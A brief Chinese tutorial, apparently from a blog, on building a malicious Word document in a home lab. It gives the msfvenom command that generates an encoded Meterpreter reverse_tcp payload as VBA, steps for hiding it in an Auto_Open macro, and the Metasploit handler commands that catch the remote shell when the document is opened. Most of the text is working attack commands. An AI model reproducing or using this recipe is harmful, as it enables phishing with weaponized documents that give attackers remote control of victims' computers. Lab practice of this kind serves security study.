先把cn_office_professional_plus_2007_dvd_X12-38713.rar上传到win7虚拟上,解压后,安装
然后打开kali生成恶意代码
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=8888 -e x86/shikata_ga_nai -i 10 -f vba-exe
复制代码从Uuvqcerqez开始到最后,回到win7 打开word点击视图点击宏 宏名为Auto_Open新建文档
复制第一段代码粘贴到上面保存
之后把第二段粘贴到正文保存为启用宏的文档
回到kali配置监听模块
msfconsole
msf5 exploit(multi/browser/java_jre17_driver_manager) > use exploit/multi/handler msf5
exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set
LHOST 192.168.1.53 msf5 exploit(multi/handler) > jobs -K msf5 exploit(multi/handler) > exploit
配置好侦听之后我们打开我们制作的word文档,文档一旦打开就会执行payload连接到MSF, 关闭word文档之后session不受影响
成功.
© 版权声明
THE END
暂无评论内容